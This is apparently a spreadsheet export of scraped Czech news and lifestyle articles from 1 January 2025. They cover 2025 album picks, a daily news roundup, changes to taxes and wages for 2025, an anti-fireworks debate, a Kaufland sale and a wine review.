Vedral Make Them Suffer : Make Them Suffer O metalcorovém albu roku 2024 mám jasno. Make Them Suffer se svou eponymní deskou ze sebe dostali to nejlepší a ukázali světu intenzivní nahrávku, jejíž tvrdý zvuk nástrojů podporují i šílené elektronické samply. Album je zároveň typickou ukázkou aktuální podoby metalu s vynikající produkcí, která posluchače vezme na dynamickou jízdu plnou breakdownů, screamů i čistých ženských vokálů, o které se postarala nová členka sestavy – klávesistka Alex Reade. Kdo miluje metalcore, musí milovat i tohle album. Lukáš Rešl Nick Cave : Wild God Podobně jako u The Cure platí, že tohle album nabízí bolestný, ale strhující poslech. V případě Nicka Cavea ještě s pořádnou porcí vášně navíc. Honza Vedral Poppy: Negative Spaces Další raketou loňského roku v tvrdé hudbě byla bezesporu Poppy – subtilní zpěvačka kombinující pop s metalovými a corovými kytarami, která se nebojí využít i screamovacích technik hlasu. Její mistrovství se ukázalo na desce Negative Spaces, která uhranula nesmírně pestrými skladbami, jež zároveň přibližují tvrdou hudbu těm, kteří se s ní dostávají třeba poprvé do kontaktu. Obdivuhodná je na Poppy autenticita a nesmírně flexibilní vokál, který se hodí skoro do všeho. Tahle holka je prostě originál. Lukáš Rešl Royal Republic – LoveCop Pro mě osobně nejzábavnější loňské album. Mix jejich typického party rocku říznutý osmdesátkami, humor, skvělé riffy, zvuk jak víno . Jarda Konáš Sega Bodega – Dennis Vlastním jménem Salvador Navarrete dokázal na své třetí desce kombinovat hyperpop, techno, trance i hodně smutné balady – je to hudební nálož při které chcete sedět v koutě i tančit. Jak to vypadá, když si nejste jisti, jestli spíte a nebo jste vzhůru? Wlado ScHoolboy Q – Blue Lips Byl to rychlý a intenzivní zážitek, který mi připomněl staré časy a desku Oxymoron. Žádný masivní komerční sukces, ale zdravý vývoj interpreta. Vojtěch Vanda Ski Mask the Slump God – 11th Dimension Poctivá porce skladeb, návrat do soundcloudové doby smíchaný s progresem, přesnou kulometnou flow... Bavil jsem se. Vojtěch Vanda The Smile - Cutouts Druhé album The Smile je plné hezkých melodií a zvuků, skoro jdoucí proti tomu, co po celou dobu fungování razili Radiohead. Album je klidné už od prvního tracku, ale nebojí se ani rychlejších rytmů (Zero Sum). Rozhodně stojí za to si sednout a plně si desku užít od začátku do konce. Thom York se směje! Petr Malásek Seznam Tondy Kocábka: 1. The Cure Songs Of A Lost World 2. John Cale - Poptical Illusion 3. Kom Deal - Nobody Loves You More Autor: Foto: @tmpllnt @shotbyphox, a redakce</t>
  </si>
  <si>
    <t>21630</t>
  </si>
  <si>
    <t>27830</t>
  </si>
  <si>
    <t>20250101_47_3697434479_af9ba93bafc0a7a2680b.html</t>
  </si>
  <si>
    <t>af9ba93bafc0a7a2680b</t>
  </si>
  <si>
    <t>SOUHRN: Zásadní události středy 1. ledna</t>
  </si>
  <si>
    <t>SOUHRN: Zásadní události středy 1. ledna 1. 1. 2025 | Zdroj: ČT24 Policisté na místě incidentu v New Orleans Zdroj: Reuters Každý večer přinášíme přehled nejdůležitějších a nejzajímavějších událostí dne z domova i ze světa. Stručně a přehledně, ale i s potřebným kontextem. Projděte si zásadní zprávy středy 1. ledna 2025. Pavel má za zásadní, aby příští vláda zaručila bezpečnost i svobodu Česka Skutečný stav České republiky není ani zdaleka tak špatný, jak si někdy myslíme na základě záměrně šířených negativních nálad, řekl v novoročním projevu prezident Petr Pavel . Má za zásadní, aby příští vláda zaručila, že bude Česká republika nadále bezpečná, svobodná, s fungujícími zákony i férovým prostředím pro život i podnikání. Před národ s proslovem předstoupil Pavel podruhé ve své funkci. Útočník z New Orleans je po smrti, zabil deset lidí Deset lidí zemřelo a tři desítky dalších utrpěly zranění v New Orleans na jihu USA poté, co nákladní auto vjelo do davu lidí, kteří slavili příchod nového roku. Policie uvedla, že šlo o úmyslný čin. Americká FBI případ vyšetřuje jako terorismus. Útočník byl zastřelen. Velká porážka Moskvy , řekl Zelenskyj o konci tranzitu ruského plynu Ukrajina zastavila tranzit ruského plynu do Evropské unie a do Moldavska , napsal ve středu ráno web RBK- Ukrajina s odvoláním na operátora plynovodů. Stalo se tak po ukončení pětiletého kontraktu mezi společnostmi Gazprom a Naftohaz. Ukrajinský prezident Volodomyr Zelenskyj to označil za jednu z největších porážek Moskvy . Slovenský premiér Robert Fico (Smer) prohlásil, že zastavení tranzitu bude mít „drastické dopady“ na všechny v EU. Svět vstoupil do roku 2025 Příchod nového roku oslavili lidé po celém světě. V Dubaji se centrem velkolepé světelné show stala nejvyšší budova na světě Burdž Chalífa. Přes dva miliony slavících lidí čekaly na pláži Copacabana v brazilském městě Rio de Janeiro . V Jižní Koreji oslavy poznamenala nedávná letecká tragédie, ve Velké Británii je zkomplikovalo počasí. Nový rok oslavili ve středu ráno našeho času také lidé v USA . Na Times Square v New Yorku dorazilo na milion lidí. Rok 2025 jako poslední přivítaly ostrovy v Tichém oceánu , Havaj a následně Americká Samoa . Silvestr poznamenaly úrazy od petard, hasiči hlásí nejvíc požárů za sedm let Mnoho výjezdů kvůli silvestrovským oslavám evidují hasiči a také záchranáři. Jen v Praze zasahovali u stovky událostí, v devíti případech šlo o zranění způsobená zábavní pyrotechnikou. Záchranáři po celé republice řešili také otravy alkoholem nebo napadení. Hasiči hlásí nejvíc požárů za sedm let, hořelo i několik rodinných domů. Během silvestrovské noci policisté nezaznamenali žádnou mimořádnou událost, řešili ale víc konfliktních případů než v běžný den. Jehličí začalo maskovat armádu před 60 lety. Vydrželo i po revoluci Maskovací polní stejnokroj vzor 60, známý jako „jehličí“, tvořil zhruba čtvrt století základ výstroje Československé lidové armády a uplatnil se třeba i mezi trampy. Zelenou uniformu s typickým potiskem připomínajícím jehličky ze stromů, která byla oficiálně zavedená k 1. lednu 1965, občas využívala ještě armáda samostatného Česka. Události (1. 1. 2025) (zdroj: ČT24) Štítky info@ceskatelevize.cz Rozcestník kanálů Autor: pba Autor person pba</t>
  </si>
  <si>
    <t>20250101_48_3697421458_527fe8e8df943cc9e9d3.html</t>
  </si>
  <si>
    <t>527fe8e8df943cc9e9d3</t>
  </si>
  <si>
    <t>Živnostníci si v roce 2025 připlatí. Jaké další změny nás čekají?</t>
  </si>
  <si>
    <t>Živnostníci si v roce 2025 připlatí. Jaké další změny nás čekají? V roce 2025 čekají živnostníky, zaměstnance i zaměstnavatele nebo třeba rodiče změny. Za co si v novém roce připlatíme a kdo si polepší? Rodičovská dovolená Zaměstnanci mají právo na stejné pracovní místo až do dvou let věku dítěte (nyní je to jeden rok). Možnost kombinovat rodičovskou dovolenou s prací na dohodu o provedení práce (DPP) nebo dohodu o pracovní činnosti (DPČ), bez omezení výše příjmu. Osoby samostatně výdělečně činné (OSVČ) Minimální záloha na sociální pojištění : Hlavní činnost: zvýšení na 4759 Kč/měsíc (z 2944 Kč). Vedlejší činnost: zvýšení na 1496 Kč/měsíc (z 1178 Kč). Minimální záloha na zdravotní pojištění : zvýšení na 3143 Kč/měsíc (z 2722 Kč). Paušální daň v 1. pásmu vzroste na 8716 Kč/měsíc (z 7498 Kč). Začínající OSVČ budou mít první dva roky nulové zálohy , ale následně budou muset doplatit celou částku za toto období. Mzdy Minimální mzda vzroste na 20 800 Kč (z 17 300 Kč). Zaručené mzdy budou zrušeny v soukromé sféře, což poskytne firmám větší flexibilitu. Možnost sjednat výplatu mzdy v cizí měně i u zaměstnání v ČR. Důchody Od ledna 2025 se očekává zvýšení starobních důchodů o průměrných 400 Kč měsíčně v rámci pravidelné valorizace. Zkušební doba a výpovědi Maximální délka zkušební doby: 3 měsíce pro běžné zaměstnance (beze změny). 6 měsíců pro vedoucí pracovníky (novinka). Při organizačních výpovědích musí zaměstnavatel nabídnout zaměstnanci jiné pracovní místo , pokud je k dispozici. Příspěvek na bydlení Zvýšení normativních nákladů na bydlení : Například u jednotlivce v nájmu ve městě do 10 000 obyvatel vzroste na 13 380 Kč (z 11 600 Kč). Spotřební daně Alkohol : zvýšení o 10 % . Tabákové výrobky: zvýšení o 5 % . Zavedení spotřební daně na: Náplně do elektronických cigaret : 5 Kč/ml. Nikotinové sáčky : 0,8 Kč/g. Ekologie Zavedení poplatků za znečišťování ovzduší a produkci odpadů , konkrétní částky budou vyhlášeny regionálně. Pracovní podmínky Povinný odpočinek mezi dvěma směnami bude minimálně 11 hodin (platí i pro flexibilní pracovní úvazky). Silnice a dálnice Rozšíření zpoplatněných úseků silnic. Například nové dálnice D3 a D35 budou zahrnuty do mýtného systému. Daně DPH : Některé služby a zboží přejdou do nižších sazeb DPH, konkrétní seznam bude upřesněn. Daň z nemovitých věcí : Zvýšení sazeb v některých regionech, o kolik, rozhodnou obce. Právní změny Registrované partnerství: Zlepšení podmínek pro dědictví a zdravotní péči. Právo na digitální komunikaci s úřady bylo odloženo, ale digitalizace veřejné správy pokračuje. Datum: 1. 1. 2025 Autor: Alena Špergová Autor: MAXX Creative s.r.o. 2021</t>
  </si>
  <si>
    <t>458</t>
  </si>
  <si>
    <t>453</t>
  </si>
  <si>
    <t>20250101_49_3697421154_8c892b69b855748cddd5.html</t>
  </si>
  <si>
    <t>8c892b69b855748cddd5</t>
  </si>
  <si>
    <t>399</t>
  </si>
  <si>
    <t>20250101_5_3698502622_6de2bb914b4c82493083.html</t>
  </si>
  <si>
    <t>6de2bb914b4c82493083</t>
  </si>
  <si>
    <t>Petardy? Náhražka ejakulace. Nepoužívám, odhalil herec Čermák. A začala rvačka</t>
  </si>
  <si>
    <t>Petardy? Náhražka ejakulace. Nepoužívám, odhalil herec Čermák. A začala rvačka Herec Hynek Čermák se zapojil do kulturního boje proti oslavám nového roku rachejtlemi a ohňostroji. „Ne, to já nepoužívám, to je taková náhražka ejakulace,“ řekl na otázku, zda „Odpaluje na Silvouše petardy“. A dostal pořádně naloženo. Hynek Čermák , který se proslavil v komediích Díra u Hanušovic nebo Aristokratka ve varu, se pustil do kulturního boje za zákaz rachejtlí a ohňostrojů na oslavu nového roku. „Ne, to já nepoužívám, to je taková náhražka ejakulace. Já nemám na nový rok zapotřebí bedny s nápisem Sexy rachot nebo mohutný výstřik,“ zaútočil na Instagramu Čermák na mužskou hrdost. Zobrazit příspěvek na Instagramu Příspěvek sdílený Hynek Cˇerma´k (@cermakhynek) Pod jeho příspěvkem se objevila velká spousta souhlasných komentářů. Většina zohledňovala zvířata. „Já bych to zakázal úplně, nevidím na tom nic dobrého jako milovník zvířat a pejsků, ale taky z profesního hlediska. Přeji vám do nového roku hlavně zdravíčko, lásku a štěstí a zůstaňte takový, jaký jste,“ dostalo se Čermákovi souhlasné reakce od Josefa Zapletala. Dagmar pak Čermákovi popsala hororovou noc se svým psem. „Bylo to hrozně hrozné, ta půlnoc, musela jsem pořád mého stafordšíra uklidňovat, jak moc se bála, chudinka, nevěděla co se děje a to docela česky umí,“ napsala Dagmar. A došlo na popis dalšího hororu. „A kolik blbců to po sobě uklízí? Každý se ohání právem se bavit, ale oni hodí petardu bůhví kam daleko a už si ji nepřijdou zvednout. Máme zahradu plnou bordelu od cizích lidí. Řízený ohňostroj mi nevadí, ale odpalování petard, co umí jen ránu jak z děla - to je opravdu pro blby. My chtěli v noci ven před dům, soused položil na příjezdové cestě nějaký pack, po druhé ráně se převrátil a rachejtle lítaly po chodníku a cestě přímo do lidí. Naštěstí jsme zrovna stáli za autem, ale chvíli před tím jsme stáli na tom místě, kam to litalo. Tak jsme šli zase domů, nenecháme se zmrzačit debilama,“ popsala Čermákovi komentátorka. Došlo i na analýzu finanční situace občanů České republiky . „Lidi brečej jak nemají prachy, jak drahota, fYjala apod. Asi to tak špatný nebude, když se najde tolik lidí, co neváhá vyhodit tisíce za pár vteřin pif paf,“ mínil jeden z diskutujících. Jenže sešly se i nesouhlasící komentáře. „ Hynku rozhodně mi to jako výstřik ani ejakulace nepřipadá, celý rok nevezmu rachejtli do ruky, ale na silvestra si s dětmi jednu bedýnku a pár čmeláků zapálíme a děti se na to prostě těší, psa mám taky, ale vždycky jednou za rok to zvládne, jasně odsuzují zlitky který s tím dělaj blbosti a bordel,“ dozvěděl se z komentářů Čermák. Stává se odpálení několika rachejtlí pro pobavení dětí snad trestným činem? „Mám vás rád, ale tohle je hloupý názor. Rozhodně souhlasím s tím že to není hračka a nepatří to ožralejm dementům do ruky. Sám s dětma kupuji pouze ty velké boxy, kde se s trochou intelegence nemá co stát a odpalíme to o půlnoci. Ale srovnávat to takhle? Jsem toho názoru, že lidé s velkým dosahem by neměli veřejně vyjadřovat názory. Vy to aspoň řeknete inteligentně, na rozdíl od projevů těch blbů jako je Hrušínský a Přibáň…“ dočetl se Čermák. Slovo obhajoby získala v diskusi i svoboda. „Vážení, to že by mate nějaký pohled na svět neznamená, že ho bude každý dodržovat podle vás. Já neházím nic, ale taky nemám potřebu tady kázat jak je to debilní. Je to můj dojem a nebudu ho tlačit pod totálně dementním argumentem ještě veřejnosti,“ zaznělo. Někdo pije celý rok a někdo si na jeho konci jen odpálí pár petard, zaznělo. „Tak někdo si třeba místo chlastání jednou za rok odpálí na Silvestra krabici. Každý slaví jinak, někdo chlastá celý rok a trápí a obtěžuje své okolí. Tihle trapní odpůrci ohňostrojů a petard, co vždy začnou křičet v posledním týdnu v roce, jak by to zakázali, jsou kapitola sama pro sebe.“ Hynek Čermák se dočetl i o tom, že je komediant. „Máslo nejíte, petardy už s věkem neodpalujete, njn, tak se snažíte být cool, jako správný komediant, byste mohl ještě přidat nějakou odbojovou činnost za minulého režimu, jako Vetchý, lidi to od vás pobaví,“ stálo v diskusi. Své slovo zase získala obhajoba svobody. „Jasně, ale nebudu to zakazovat ostatním. A o tom to je.“ Nakonec s Hynkem Čermákem názorově zúčtoval Robin Zámek, sám chovatel několika psů. „Já mam psy, ohňostroje neděláme, ale ať si proboha dělá každý co chce, pořád nějaké omezování, příkazy, vyhlášky, buzerace… Vice svobody by to chtělo…“ napsal Zámek. Proti dostupnému prodeji pyrotechniky chystá boj i ministerstvo pro životní prostředí, které řídí Petr Hladík (KDU-ČSL). Ten chce do legislativy zavést , aby byla pyrotechnika daleko hůře dostupná. Běžně dostupné by měly zůstat prskavky nebo bouchací kuličky. „Pyrotechnika způsobuje každoročně psům, ale i řadě hospodářských zvířat mnoho problémů. Máme zaznamenané případy předčasných porodů mrtvých telat, ke kterým došlo po odpálení hlasité pyrotechniky v okolí zemědělských podniků. Jsem proto rád, že přistupujeme k regulaci prodeje a použití pyrotechniky, především té, jejímž hlavním a často jediným účelem je udělat co největší hluk,“ napsal k iniciativě lidovecký předseda Marek Výborný , který stojí u zákazu pyrotechniky po boku svého kolegy Hladíka . Patřičně zdramatizovala situaci i poslankyně hnutí STAN. „Současné používání zábavní pyrotechniky je neudržitelné. Celý prosinec jsou česká a moravská města obtěžována velkou zátěží hluku a smradu. Nejde o jednu noc v roce, ale typicky o celý měsíc, kdy se hazarduje se zdravím lidí i zvířat,“ napsala na Facebooku. Tento článek je uzamčen Po kliknutí na tlačítko "odemknout" Vám zobrazíme odpovídající možnosti pro odemčení a případnému sdílení článku. Přidejte si PL do svých oblíbených zdrojů na Google Zprávy . Děkujeme. Foto: Jan Rychetský Popisek: V Prachaticích vystavuje herec a fotograf Hynek Čermák Rubrika transition_slide Monitor</t>
  </si>
  <si>
    <t>211560</t>
  </si>
  <si>
    <t>20250101_50_3697416245_af996369652924a42fc1.html</t>
  </si>
  <si>
    <t>af996369652924a42fc1</t>
  </si>
  <si>
    <t>Zítra vypukne obří slevová akce v Kauflandu: Máslo za pár korun!</t>
  </si>
  <si>
    <t>Zítra vypukne obří slevová akce v Kauflandu : Máslo za pár korun! 1. 1. 2025 Kaufland spouští obří akci na základní potraviny. Foto: Shutterstock Už zítra, 2. ledna, vypukne v Kauflandu Plzeň slevová akce, která potěší všechny šetřivé domácnosti. Ať už chystáte rodinný oběd, doplňujete zásoby, nebo hledáte rychlou svačinu, v nabídce najdete opravdové poklady za výhodné ceny. Podívejte se na to nejzajímavější, co můžete pořídit! Máte prázdnou ledničku po silvestrovských oslavách? Kaufland má pro vás dobrou zprávu. Od zítřka spouští velké slevy na běžné potraviny, takže si můžete zase naplnit spíž, aniž by to výrazně zatížilo vaši peněženku. A to se po nákladných svátcích určitě hodí. Kaufland zlevňuje skoro všechno - od čerstvého ovoce a zeleniny až po mléčné výrobky a maso. A kdo shání máslo, může se těšit na skutečně skvělou cenu. A pokud například hledáte kvalitní šunku za pár korun? Pak si určitě nenechte ujít Baby šunku nejvyšší jakosti od Bivoje za neuvěřitelných 20 Kč. Ideální do sendvičů nebo jen tak na talíř s čerstvým pečivem. Foto: Shutterstock Sleva bude i na další potraviny, které se budou hodit Máslo, jehož cena v posledních letech letí nahoru, teď můžete koupit za pouhých 59,90 Kč. Výborné na pečení, vaření, nebo jen tak na namazání – kdo by odolal? Za symbolických 10 Kč si teď můžete odnést oblíbenou mléčnou rýži od Mlékárny Kunín . Ideální svačina pro děti i dospělé, kterou budete mít vždy po ruce. Vepřová krkovice bez kosti je základ každého pořádného oběda. Nyní ji pořídíte za 104,90 Kč za půl kila. Gril, trouba, nebo pánvička – možností je spousta!Dokonalý úsměv už nemusí být drahý. Colgate pasty na zuby teď pořídíte za pouhých 20 Kč. Kdy jindy se zásobit, když ne teď? Vybírat můžete i z ostatních potravin za lákavé ceny Kaufland teď nabízí extra lákavé slevy na běžné potraviny. Vaječné těstoviny Malitas můžete mít za necelých 15 korun, a to v jakémkoliv tvaru, co si vyberete. Červená paprika zlevnila ze 70 korun na 55 korun, takže si můžete dopřát čerstvou zeleninu za fajn cenu. A kdo má rád dobré české pivo , může si nakoupit Gambrinus desítku jen za 12 korun, což je skutečně přijatelná cena, za kterou se vyplatí koupit i větší balení. Foto: Kaufland Leták je platný od 2. do 7. ledna Akce platí od 2. do 7. ledna 2025. Pokud máte rádi výhodné nákupy, tohle je ta pravá chvíle vyrazit. A protože je Kaufland na Nový rok zavřený, dá se čekat, že zítra tam bude pěkně plno. Pokud nechcete trčet ve frontách, zajděte tam brzy ráno, to bývá klid. Můžete to zkusit i večer, než se váš oblíbený obchod zavře, ale to už nemusíte sehnat všechno, co potřebujete. Věrnostní program Kaufland Card přinese velké slevy Kaufland má už čtyři roky věrnostní program, který vám může ušetřit nějakou tu korunu. Stačí si pořídit jejich kartu - buď klasickou plastovou do peněženky, nebo si stáhnout appku do mobilu. Kromě extra slev nabízí Kaufland i zákaznickou vychytávku jménem K-Scan. S ní si můžete zboží rovnou naskenovat mobilem nebo speciální čtečkou a dát ho do tašky. U pokladny pak nemusíte nic vyndávat, jen zaplatíte spočítanou částku a jdete. Tato novinka však funguje jen v některých prodejnách. Sociální sítě Chcete vědět vše jako první a získat exkluzivní fotografie, které nikdo nemá? Sledujte nás a připravte se na bohatou nálož aktuálních zpráv. Zdroje: autorský text Autor: Michaela Hanelová Autor person Michaela Hanelová</t>
  </si>
  <si>
    <t>20250101_51_3697423458_35d3b893c0046be89b65.html</t>
  </si>
  <si>
    <t>35d3b893c0046be89b65</t>
  </si>
  <si>
    <t>Silvestrovské vraždění: Psycholog popsal, proč může být poslední den roku spouštěčem traumat Silvestr a Nový rok bývají pro mnohé hlavně časem oslav a radostného setkávání s blízkými. Podle psychologa Jana Laška ovšem někdy stačí málo a příjemný večer se může zvrtnout v traumatizující zážitek. Během silvestrovské noci policie a záchranáři zasahují u desítek až stovek případů agresivních útočníků. Spouštěčem nevyzpytatelného chování přitom nemusí být jen přehnané pití alkoholu . „Může se to stát, pokud je člověk po delší dobu sám a samota ho trápí,“ popsal pro CNN Prima NEWS psycholog Jan Lašek jednu z pohnutek agresivního chování. „Člověk může mít někdy pocit, že jeho trápení zavinili druzí a napadne je, aniž by za to skutečně mohli,“ dodal. Takový případ se odehrál například v poslední den roku 2022 v Karlových Varech . Do lázeňského města zavítal tehdy 24letý osamělý Afghánec Esmar Shirzad , který od roku 2015 žil v Německu jako žadatel o azyl. Muž se v centru města večer seznámil s 37letou ženou, kterou později v noci v odlehlém lesíku pobodal. Napadená žena útok přežila. Shirzad následně opodál napadl a znásilnil devatenáctiletou dívku. Agresor si na osudnou noc u soudního přelíčení podle svých slov nepamatoval. Naopak si stěžoval na policejní brutalitu po zadržení. V březnu 2023 si Shirzad od soudu vyslechl trest 22 let vězení, uvedl web iDnes . Nebezpečné rodinné spory Kombinace nadměrné konzumace alkoholu a nevyřešených sporů byla příčinou také tragédie na Silvestra roku 2016 v Rýmařově . 62letý muž tehdy v záchvatu žárlivosti před půlnocí vytáhl nůž na 35letého známého a po hádce ho před svědky ubodal. Otec tří malých dětí během pár chvil vykrvácel. „Prý se ho nedalo zachránit. Dali mu šest transfuzí, jednou jim prý naskočil,“ svěřila se v červenci 2017 matka oběti serveru TN . Podle Laška je dobré se na setkání s příbuznými či s přáteli vnitřně připravit a nevyvolávat v sobě negativní emoce. „Člověk by si měl především říct, že by se neměl primárně naštvat nebo jít na to setkání s tím, že určitě dojde k nějakému sporu,“ doporučil psycholog. reportér CNN Prima NEWS redaktor FTV Prima , CNN Prima NEWS Autor: Antonin Roos, Martin Holek Autoři person Antonin Roos person Martin Holek</t>
  </si>
  <si>
    <t>20250101_52_3697408073_5a6669f661658268f8ac.html</t>
  </si>
  <si>
    <t>5a6669f661658268f8ac</t>
  </si>
  <si>
    <t>Víno Spark Saint Laurent 2021, jakostní šumivé víno, Vinařství Štěpán Maňák</t>
  </si>
  <si>
    <t>Víno Spark Saint Laurent 2021, jakostní šumivé víno , Vinařství Štěpán Maňák /100 7. 1. 2024 „Tady toto je experiment jak vyšitý. Narvat aromatické odrůdy do bečky je odvaha, ale má to něco do sebe. Vůně je aromatická, ale v chuti už se podepsal výrazně sud. Mě toto víno celkem bavilo, nicméně to není pití na celý večer.“ /100 23. 5. 2024 „3. mezi Rulandskými bílými v květnovém kole našich dálkových degustací. Blíže o pravidlech a možnosti účasti přes můj profil. V pořadích jednotlivých degustátorů se umístilo následovně: 5,2,4,4,5,5,2. “ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20250101_53_3697406974_ed940f0303ca8ecefc9b.html</t>
  </si>
  <si>
    <t>ed940f0303ca8ecefc9b</t>
  </si>
  <si>
    <t>Živnostníci si v roce 2025 připlatí. Jaké další změny nás čekají? Datum: 1. 1. 2025 Autor: Alena Špergová V roce 2025 čekají živnostníky, zaměstnance i zaměstnavatele nebo třeba rodiče změny. Za co si v novém roce připlatíme a kdo si polepší? Rodičovská dovolená Zaměstnanci mají právo na stejné pracovní místo až do dvou let věku dítěte (nyní je to jeden rok). Možnost kombinovat rodičovskou dovolenou s prací na dohodu o provedení práce (DPP) nebo dohodu o pracovní činnosti (DPČ), bez omezení výše příjmu. Osoby samostatně výdělečně činné (OSVČ) Minimální záloha na sociální pojištění: Hlavní činnost: zvýšení na 4759 Kč/měsíc (z 2944 Kč). Vedlejší činnost: zvýšení na 1496 Kč/měsíc (z 1178 Kč). Minimální záloha na zdravotní pojištění: zvýšení na 3143 Kč/měsíc (z 2722 Kč). Paušální daň v 1. pásmu vzroste na 8716 Kč/měsíc (z 7498 Kč). Začínající OSVČ budou mít první dva roky nulové zálohy, ale následně budou muset doplatit celou částku za toto období. Mzdy Minimální mzda vzroste na 20 800 Kč (z 17 300 Kč). Zaručené mzdy budou zrušeny v soukromé sféře, což poskytne firmám větší flexibilitu. Možnost sjednat výplatu mzdy v cizí měně i u zaměstnání v ČR. Důchody Od ledna 2025 se očekává zvýšení starobních důchodů o průměrných 400 Kč měsíčně v rámci pravidelné valorizace. Zkušební doba a výpovědi 3 měsíce pro běžné zaměstnance (beze změny). 6 měsíců pro vedoucí pracovníky (novinka). Při organizačních výpovědích musí zaměstnavatel nabídnout zaměstnanci jiné pracovní místo, pokud je k dispozici. Příspěvek na bydlení Zvýšení normativních nákladů na bydlení: Například u jednotlivce v nájmu ve městě do 10 000 obyvatel vzroste na 13 380 Kč (z 11 600 Kč). Spotřební daně Alkohol : zvýšení o 10 %. Tabákové výrobky: zvýšení o 5 %. Zavedení spotřební daně na: Náplně do elektronických cigaret: 5 Kč/ml. Nikotinové sáčky: 0,8 Kč/g. Ekologie Zavedení poplatků za znečišťování ovzduší a produkci odpadů, konkrétní částky budou vyhlášeny regionálně. Pracovní podmínky Povinný odpočinek mezi dvěma směnami bude minimálně 11 hodin (platí i pro flexibilní pracovní úvazky). Silnice a dálnice Rozšíření zpoplatněných úseků silnic. Například nové dálnice D3 a D35 budou zahrnuty do mýtného systému. Daně DPH: Některé služby a zboží přejdou do nižších sazeb DPH, konkrétní seznam bude upřesněn. Daň z nemovitých věcí: Zvýšení sazeb v některých regionech, o kolik, rozhodnou obce. Právní změny Registrované partnerství: Zlepšení podmínek pro dědictví a zdravotní péči. Právo na digitální komunikaci s úřady bylo odloženo, ale digitalizace veřejné správy pokračuje. Autor: MAXX Creative s.r.o. 2021</t>
  </si>
  <si>
    <t>190</t>
  </si>
  <si>
    <t>20250101_54_3697398726_13e301c30f1380805091.html</t>
  </si>
  <si>
    <t>13e301c30f1380805091</t>
  </si>
  <si>
    <t>726</t>
  </si>
  <si>
    <t>20250101_55_3697395271_1c0a0d62236adfcf79df.html</t>
  </si>
  <si>
    <t>1c0a0d62236adfcf79df</t>
  </si>
  <si>
    <t>Živnostníci si v roce 2025 připlatí. Jaké další změny nás čekají? Datum: 1. 1. 2025 Autor: Alena Špergová V roce 2025 čekají živnostníky, zaměstnance i zaměstnavatele nebo třeba rodiče změny. Za co si v novém roce připlatíme a kdo si polepší? Rodičovská dovolená Zaměstnanci mají právo na stejné pracovní místo až do dvou let věku dítěte (nyní je to jeden rok). Možnost kombinovat rodičovskou dovolenou s prací na dohodu o provedení práce (DPP) nebo dohodu o pracovní činnosti (DPČ), bez omezení výše příjmu. Osoby samostatně výdělečně činné (OSVČ) Minimální záloha na sociální pojištění: Hlavní činnost: zvýšení na 4759 Kč/měsíc (z 2944 Kč). Vedlejší činnost: zvýšení na 1496 Kč/měsíc (z 1178 Kč). Minimální záloha na zdravotní pojištění: zvýšení na 3143 Kč/měsíc (z 2722 Kč). Paušální daň v 1. pásmu vzroste na 8716 Kč/měsíc (z 7498 Kč). Začínající OSVČ budou mít první dva roky nulové zálohy, ale následně budou muset doplatit celou částku za toto období. Mzdy Minimální mzda vzroste na 20 800 Kč (z 17 300 Kč). Zaručené mzdy budou zrušeny v soukromé sféře, což poskytne firmám větší flexibilitu. Možnost sjednat výplatu mzdy v cizí měně i u zaměstnání v ČR. Důchody Od ledna 2025 se očekává zvýšení starobních důchodů o průměrných 400 Kč měsíčně v rámci pravidelné valorizace. Zkušební doba a výpovědi 3 měsíce pro běžné zaměstnance (beze změny). 6 měsíců pro vedoucí pracovníky (novinka). Při organizačních výpovědích musí zaměstnavatel nabídnout zaměstnanci jiné pracovní místo, pokud je k dispozici. Příspěvek na bydlení Zvýšení normativních nákladů na bydlení: Například u jednotlivce v nájmu ve městě do 10 000 obyvatel vzroste na 13 380 Kč (z 11 600 Kč). Spotřební daně Alkohol : zvýšení o 10 %. Tabákové výrobky: zvýšení o 5 %. Zavedení spotřební daně na: Náplně do elektronických cigaret: 5 Kč/ml. Nikotinové sáčky: 0,8 Kč/g. Ekologie Zavedení poplatků za znečišťování ovzduší a produkci odpadů, konkrétní částky budou vyhlášeny regionálně. Pracovní podmínky Povinný odpočinek mezi dvěma směnami bude minimálně 11 hodin (platí i pro flexibilní pracovní úvazky). Silnice a dálnice Rozšíření zpoplatněných úseků silnic. Například nové dálnice D3 a D35 budou zahrnuty do mýtného systému. Daně DPH: Některé služby a zboží přejdou do nižších sazeb DPH, konkrétní seznam bude upřesněn. Daň z nemovitých věcí: Zvýšení sazeb v některých regionech, o kolik, rozhodnou obce. Právní změny Registrované partnerství: Zlepšení podmínek pro dědictví a zdravotní péči. Právo na digitální komunikaci s úřady bylo odloženo, ale digitalizace veřejné správy pokračuje. Hitrádio Faktor | U Tří lvů 256/5 370 01 České Budějovice Recepce: +420 389 011 111 Hitrádio mediálně zastupuje: RADIOHOUSE. Chcete-li realizovat v naší stanici reklamní kampaň, navštivte web Radiohouse.cz Snídaně šampionů na Hitrádiu Faktor POSLOUCHEJ MĚ! Podcast Hitrádia o velkých starostech malých lidí Souhlas s cookies přináší výhody plného využití vašeho webu Soubory cookies nám pomáhají lépe porozumět vašim preferencím a přizpůsobit náš obsah vašim potřebám. Ale nebojte se, naše cookies jsou přátelské a bezpečné! K jejich použití potřebujeme váš souhlas. Co jsou cookies a proč je používáme Cookies jsou malé datové soubory, které pomáhají webu správně fungovat a vám zpříjemňují jeho prohlížení. Stránky, které otevřete, ukládají cookies do vašeho prohlížeče a zapamatují si informace, které využijí při vaší příští návštěvě. Vyberte úroveň cookies, kterou chcete povolit Technické cookies Nutné cookies pomáhají, aby byla webová stránka použitelná tak, že umožní základní funkce jako navigace stránky a přístup k zabezpečeným sekcím webové stránky. Webová stránka nemůže správně fungovat bez těchto cookies. Analytické cookies Analytické cookies nám řeknou, jaké stránky jsou nejnavštěvovanější, jak se lidé na web dostanou (například z výsledků vyhledávání, z odkazů na jiných stránkách apod.), na co klikají, jak dlouho zůstávají apod. Díky tomu víme, co funguje a co naopak máme zlepšit. Jinými slovy, když máte zapnuté analytické cookies, pomáháte nám web dál vylepšovat. Autor: MAXX Creative s.r.o. 2021</t>
  </si>
  <si>
    <t>20250101_56_3697395278_644bb87abaf13757f1e4.html</t>
  </si>
  <si>
    <t>644bb87abaf13757f1e4</t>
  </si>
  <si>
    <t>968</t>
  </si>
  <si>
    <t>20250101_57_3697395268_190e1c8dd004371f9772.html</t>
  </si>
  <si>
    <t>190e1c8dd004371f9772</t>
  </si>
  <si>
    <t>882</t>
  </si>
  <si>
    <t>913</t>
  </si>
  <si>
    <t>20250101_58_3697393577_0d9b4678fe580ee27349.html</t>
  </si>
  <si>
    <t>0d9b4678fe580ee27349</t>
